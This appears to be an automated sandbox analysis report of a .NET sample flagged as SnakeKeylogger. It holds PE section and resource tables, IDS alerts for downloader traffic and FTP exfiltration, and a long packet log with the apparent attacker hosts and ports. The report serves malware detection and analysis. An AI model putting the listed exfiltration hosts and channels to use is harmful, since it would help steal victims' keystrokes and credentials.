                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xaea240xaec003c7fd4febadd7a7074945aa39170fd62False0.5529900415772532data7.549042885897216IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xb20000x57840x58009701a292d950693b5a538d03eface908False0.30854936079545453data5.307373461337928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xb80000xc0x200843f732a168a539c2232216f4ca11900False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xb21f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.4920212765957447
                                                    RT_ICON0xb26580x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.32704918032786884
                                                    RT_ICON0xb2fe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.2303001876172608
                                                    RT_ICON0xb40880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.15995850622406638
                                                    RT_ICON0xb66300xc1dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8742341180264431
                                                    RT_GROUP_ICON0xb72500x4cdata0.75
                                                    RT_VERSION0xb729c0x2fcdata0.4397905759162304
                                                    RT_MANIFEST0xb75980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/17/24-14:17:22.648999TCP2845532ETPRO TROJAN SnakeKeylogger Exfil via FTP M14975621192.168.2.4213.189.52.181

                                                    Suricata IDS Alerts

                                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                    2024-07-17T14:17:08.911771+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49742443192.168.2.4188.114.97.3
                                                    2024-07-17T14:19:21.508196+0200TCP2845532ETPRO MALWARE SnakeKeylogger Exfil via FTP M14975621192.168.2.4213.189.52.181
                                                    2024-07-17T14:17:11.365188+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49747443192.168.2.4188.114.97.3
                                                    2024-07-17T14:17:05.037579+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973080192.168.2.4193.122.130.0
                                                    2024-07-17T14:17:58.639130+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434976320.114.59.183192.168.2.4
                                                    2024-07-17T14:17:20.554901+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434975320.114.59.183192.168.2.4
                                                    2024-07-17T14:17:05.614505+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49735443192.168.2.4188.114.97.3
                                                    2024-07-17T14:17:06.146860+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973680192.168.2.4193.122.130.0

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 17, 2024 14:17:01.812906027 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:01.820828915 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:01.820899963 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:01.821135998 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:01.825963974 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:03.038635015 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:03.044138908 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:03.049114943 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:03.339458942 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:03.381093979 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:03.390256882 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:03.390300989 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:03.390372038 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:03.398471117 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:03.398480892 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:03.903309107 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:03.903419018 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:03.993012905 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:03.993050098 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:03.993474007 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:04.037381887 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:04.291119099 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:04.336500883 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:04.476017952 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:04.476131916 CEST44349733188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:04.476324081 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:04.596721888 CEST49733443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:04.600856066 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:04.606379986 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:04.984718084 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:05.015737057 CEST49735443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:05.015786886 CEST44349735188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:05.015857935 CEST49735443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:05.016186953 CEST49735443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:05.016205072 CEST44349735188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:05.037579060 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:05.481162071 CEST44349735188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:05.483251095 CEST49735443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:05.483295918 CEST44349735188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:05.614490986 CEST44349735188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:05.614574909 CEST44349735188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:05.614614964 CEST49735443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:05.615365982 CEST49735443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:05.620044947 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:05.621422052 CEST4973680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:05.627546072 CEST8049736193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:05.627620935 CEST4973680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:05.627724886 CEST4973680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:05.630358934 CEST8049730193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:05.630431890 CEST4973080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:05.632539988 CEST8049736193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:06.091027021 CEST8049736193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:06.092793941 CEST49737443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:06.092842102 CEST44349737188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:06.092919111 CEST49737443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:06.093241930 CEST49737443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:06.093255043 CEST44349737188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:06.146859884 CEST4973680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:06.557722092 CEST44349737188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:06.568149090 CEST49737443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:06.568185091 CEST44349737188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:06.708193064 CEST44349737188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:06.708292961 CEST44349737188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:06.708611965 CEST49737443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:06.708920002 CEST49737443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:06.714010000 CEST4973880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:06.720541000 CEST8049738193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:06.720664024 CEST4973880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:06.720724106 CEST4973880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:06.728071928 CEST8049738193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:07.212661028 CEST8049738193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:07.213989973 CEST49739443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:07.214034081 CEST44349739188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:07.214108944 CEST49739443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:07.214361906 CEST49739443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:07.214379072 CEST44349739188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:07.256146908 CEST4973880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:07.674343109 CEST44349739188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:07.683389902 CEST49739443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:07.683409929 CEST44349739188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:07.813129902 CEST44349739188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:07.813384056 CEST44349739188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:07.813452005 CEST49739443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:07.813931942 CEST49739443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:07.818218946 CEST4973880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:07.819134951 CEST4974180192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:07.823730946 CEST8049738193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:07.823792934 CEST4973880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:07.824019909 CEST8049741193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:07.824099064 CEST4974180192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:07.824177980 CEST4974180192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:07.828958035 CEST8049741193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:08.317326069 CEST8049741193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:08.318909883 CEST49742443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:08.318950891 CEST44349742188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:08.319010019 CEST49742443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:08.319385052 CEST49742443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:08.319396973 CEST44349742188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:08.365469933 CEST4974180192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:08.784497023 CEST44349742188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:08.786130905 CEST49742443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:08.786161900 CEST44349742188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:08.911788940 CEST44349742188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:08.911880016 CEST44349742188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:08.911938906 CEST49742443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:08.912803888 CEST49742443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:08.916625023 CEST4974180192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:08.918001890 CEST4974480192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:08.930402040 CEST8049744193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:08.932056904 CEST8049741193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:08.932158947 CEST4974180192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:08.932169914 CEST4974480192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:08.932322979 CEST4974480192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:08.937427998 CEST8049744193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:09.408221960 CEST8049744193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:09.409503937 CEST49745443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:09.409595966 CEST44349745188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:09.409863949 CEST49745443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:09.409956932 CEST49745443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:09.409975052 CEST44349745188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:09.459244967 CEST4974480192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:10.117258072 CEST44349745188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:10.119112015 CEST49745443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:10.119158030 CEST44349745188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:10.273317099 CEST44349745188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:10.273416996 CEST44349745188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:10.273477077 CEST49745443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:10.274003983 CEST49745443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:10.277514935 CEST4974480192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:10.278804064 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:10.283199072 CEST8049744193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:10.283289909 CEST4974480192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:10.284233093 CEST8049746193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:10.284327030 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:10.284399033 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:10.289766073 CEST8049746193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:10.763042927 CEST8049746193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:10.764143944 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:10.764199972 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:10.764282942 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:10.764602900 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:10.764617920 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:10.818692923 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.225435972 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.227528095 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.227580070 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.365185022 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.365638971 CEST44349747188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.365822077 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.367938995 CEST49747443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.373411894 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.374238968 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.379071951 CEST8049746193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.379116058 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.379122019 CEST4974680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.379170895 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.379313946 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:11.384105921 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.837635994 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:11.839603901 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.839659929 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.839741945 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.840069056 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:11.840087891 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:11.881146908 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.305113077 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.307115078 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:12.307157040 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.452521086 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.452630997 CEST44349749188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:12.452735901 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:12.453497887 CEST49749443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:12.456985950 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.458267927 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.462640047 CEST8049748193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:12.462734938 CEST4974880192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.463455915 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:12.463535070 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.463634014 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:12.468437910 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.264460087 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.265459061 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.265676975 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:13.266202927 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.266259909 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.266345978 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.266648054 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.266663074 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.758335114 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.760550976 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.760587931 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.910722971 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.910816908 CEST44349751188.114.97.3192.168.2.4
                                                    Jul 17, 2024 14:17:13.910861015 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.911417961 CEST49751443192.168.2.4188.114.97.3
                                                    Jul 17, 2024 14:17:13.927018881 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:13.933034897 CEST8049750193.122.130.0192.168.2.4
                                                    Jul 17, 2024 14:17:13.933100939 CEST4975080192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:13.935486078 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:13.935513020 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:13.935566902 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:13.936093092 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:13.936106920 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.575814009 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.575896978 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.578023911 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.578042030 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.578269958 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.580357075 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.624500990 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.828084946 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.828263998 CEST44349752149.154.167.220192.168.2.4
                                                    Jul 17, 2024 14:17:14.828496933 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:14.833448887 CEST49752443192.168.2.4149.154.167.220
                                                    Jul 17, 2024 14:17:20.212431908 CEST4973680192.168.2.4193.122.130.0
                                                    Jul 17, 2024 14:17:20.438886881 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:20.443698883 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:20.443783998 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.064588070 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.064830065 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.069911003 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.257766008 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.258104086 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.265224934 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.524398088 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.524672985 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.529511929 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.714761972 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.714934111 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.719718933 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.904567957 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:21.904773951 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:21.909862995 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.450741053 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.450953007 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.451524973 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.451704025 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.456768990 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.642566919 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.643626928 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.648535013 CEST6421249759213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:22.648895025 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.648998976 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:22.661417961 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.204821110 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.209404945 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.211287022 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.214360952 CEST6421249759213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.216543913 CEST6421249759213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.220947027 CEST4975964212192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.256294966 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:23.420774937 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:23.474901915 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:24.930371046 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:24.935461044 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.396604061 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.397322893 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.398139954 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.398219109 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.402404070 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.402512074 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.402735949 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.407797098 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.970232964 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.973108053 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.973108053 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:25.979491949 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979523897 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979636908 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979664087 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979691982 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.979795933 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.980603933 CEST6411949761213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:25.980972052 CEST4976164119192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:26.021910906 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:26.328495979 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:26.381297112 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:27.837539911 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:27.843977928 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.034118891 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.034774065 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.039767027 CEST6301449762213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.039839983 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.039921999 CEST4975621192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.045120001 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.701682091 CEST2149756213.189.52.181192.168.2.4
                                                    Jul 17, 2024 14:17:28.702104092 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.702189922 CEST4976263014192.168.2.4213.189.52.181
                                                    Jul 17, 2024 14:17:28.707250118 CEST6301449762213.189.52.181192.168.2.4
